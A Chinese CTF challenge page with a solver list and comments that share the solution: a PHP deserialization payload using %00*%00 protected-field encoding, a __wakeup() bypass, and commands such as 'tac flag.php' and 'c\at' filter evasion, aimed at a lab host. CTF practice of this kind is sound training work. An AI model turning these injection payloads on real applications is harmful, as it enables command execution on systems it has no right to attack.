评分(4)
解题动态
dlgz 攻破了该题 1天前
小王爱汉堡 攻破了该题 3天前
磊诺 攻破了该题 6天前
2523822945 攻破了该题 7天前
好累啊 攻破了该题 8天前
要加两个蛋 攻破了该题 8天前
lin123 攻破了该题 8天前
yiluoqingqiu 攻破了该题 8天前
柯润 攻破了该题 8天前
2970554631 攻破了该题 8天前
不嘻嘻123 攻破了该题 8天前
lmz123 攻破了该题 8天前
xiemeimei 攻破了该题 8天前
18353517196 攻破了该题 8天前
折海 攻破了该题 8天前
337556453 攻破了该题 8天前
Aurora* 攻破了该题 8天前
孙笑川ᒿ58 攻破了该题 8天前
123!!! 攻破了该题 8天前
评论
kitniu 11天前
举报
1.查看源代码,base64解码;2.打开.bak文件,查看源代码;3.翻译代码,要求传入code参数,反序列化后传入ctf ,username admin cat tac flag.php
harry2025 3月前
举报
http://171.80.2.169:14918?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
陈亮 4月前
举报
flag{***}
网恋秀牛子被录屏导致自卑 4月前
举报
执行命令时,我用的“cp flag.php flag.txt”绕过,这样的话就复制了文件,然后直接访问flag.txt就行,屏幕输出NULL是因为这个命令没有输出的,但执行了。
admit 8月前
举报
/?code=O:3:%22ctf%22:3:{s:11:%22%00*%00username%22;s:5:%22admin%22;s:6:%22%00*%00cmd%22;s:12:%22tac%20flag.php%22;}
iNMB 9月前
举报
此外必须用 %00(空字符),不能用 %20(空格)。 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。 因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00 。
iNMB 9月前
举报
绕过__wakeup()后使用tac等其他输出字符的命令即可
llc123 12月前
举报
c\at flag.php也行
pezn1and 1年前
举报
code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
zbss 1年前
举报
备份网站没有文件,环境出问题了吧,退钱,我还试了两次